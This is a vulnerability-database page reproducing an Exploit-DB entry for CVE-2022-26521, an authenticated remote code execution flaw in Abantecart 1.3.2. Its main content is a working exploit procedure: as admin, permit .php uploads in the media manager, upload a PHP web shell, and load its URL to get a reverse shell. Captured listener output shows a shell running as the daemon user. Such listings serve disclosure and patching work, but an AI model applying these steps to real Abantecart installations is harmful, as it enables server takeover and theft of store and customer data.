Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Abantecart v1.3.2 - Authenticated Remote Code Execution

🗓️ 25 Mar 2023 00:00:00Reported by Sarang TumneType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 165 Views

Abantecart v1.3.2 - Authenticated Remote Code Execution CVE-2022-2652

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Abantecart v1.3.2 - Authenticated Remote Code Execution Vulnerability
27 Mar 202300:00
zdt
ATTACKERKB		CVE-2022-26521
10 Mar 202217:47
attackerkb
Circl		CVE-2022-26521
25 Mar 202300:00
circl
CNNVD		AbanteCart 代码问题漏洞
10 Mar 202200:00
cnnvd
CVE		CVE-2022-26521
7 Mar 202200:00
cve
Cvelist		CVE-2022-26521
7 Mar 202200:00
cvelist
EUVD		EUVD-2022-31078
3 Oct 202520:07
euvd
NVD		CVE-2022-26521
10 Mar 202217:47
nvd
OSV		BIT-ABANTECART-2022-26521
6 Mar 202410:50
osv
Packet Storm		Abantecart 1.3.2 Remote Code Execution
27 Mar 202300:00
packetstorm
Rows per page
# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 3rd Mar'2022
# CVE ID: CVE-2022-26521
# Confirmed on release 1.3.2
# Vendor: https://www.abantecart.com/download

###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
        Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
#Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
#Step4- Copy the Resource URL location and execute it in the browser e.g. :
Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:

listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
 11:17:51 up  2:15,  1 user,  load average: 1.91, 1.93, 1.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
bitnami  tty1     -                09:05    1:05m  0.20s  0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Mar 2023 00:00Current
7High risk
Vulners AI Score7
CVSS 26.5
CVSS 3.17.2
EPSS0.07841
abantecartauthenticatedremote code executioncve-2022-26521media manageruploadphpweb shellreverse shelllinuxdebianbitnamidaemonexploit
165